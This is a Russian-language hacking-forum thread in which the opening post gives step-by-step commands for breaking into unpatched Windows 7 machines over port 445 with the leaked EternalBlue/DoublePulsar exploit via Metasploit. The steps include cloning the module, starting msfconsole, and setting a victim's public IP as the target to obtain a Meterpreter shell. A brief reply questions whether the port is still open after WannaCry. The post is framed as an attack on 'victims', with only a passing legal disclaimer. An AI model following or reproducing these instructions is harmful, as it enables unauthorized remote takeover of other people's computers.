Взламываем windows 7 без участия жертвы [Eternalblue & Doublepulsar Exploit]

Тема в разделе "Exploits", создана пользователем birdman, 15 июл 2017.

  1. Гость, давай поддержим форум вместе, делись информацией с друзями через кнопки в блоке "Поделиться в социальных сетях"

    Скрыть объявление
  1. birdman

    birdman Новичок

    
    Регистр:
    15 июл 2017
    Сообщения:
    4
    Лайки:
    2
    Дизлайки:
    0
    Баллы:
    0
    Пол:
    Мужской
    Данный эксплоит ещё в начале мая был слит с ресурсов Агенства Национальной Безопасности США и успешно работает по сей день. Условия следующие: у жертвы должна быть 7-ая винда не важно какой системной архитектуры (32_86 или 64) и открытый 445 порт (как правило те кто пользуется виндовс 7 - он у них открыт)
    Инструкция подойдёт для атаки с дистрибутивов построенных на дебиан (пэррот, кали и тд)
    Открываем терминал, получаем рут права и пишем:
    Код:
    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
    [​IMG]
    Файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb
    [​IMG]
    Затем запускаем metasploit:
    Код:
    service postgresql start
    Код:
    service metasploit start
    Код:
    msfconsole
    Далее делаем всё как показано на скриншоте за исключением того, что в set lhost нужно прописать ваш локальный IP адрес, узнать его можно командой:
    Код:
    ifconfig
    А в set rhost пишете публичный IP адрес вашей жертвы, остальное не меняем.
    [​IMG]
    После команды:
    Код:
    exploit
    Получаем доступ к машине жертвы.
    [​IMG]

    Для тех, кто не умеет работать с шеллом meterpreter, читайте данную статью, с помощью этого шелла мы будем удалённо управлять ПК жертвы. Учтите, что взлом без разрешения является наказуемым по УК РФ на территории Российской Федерации.

    Статья по meterpreter - http://hack-tool.org/threads/46930/
     
  2. jkeee

    jkeee Участник

    
    Регистр:
    1 май 2015
    Сообщения:
    42
    Лайки:
    3
    Дизлайки:
    0
    Баллы:
    10
    Пол:
    Мужской
    разве 445 порт после вируса WannaCry не прикрыли?)
     
Похожие Темы
  1. Amanzhan
    Ответов:
    3
    Просмотров:
    288
Загрузка...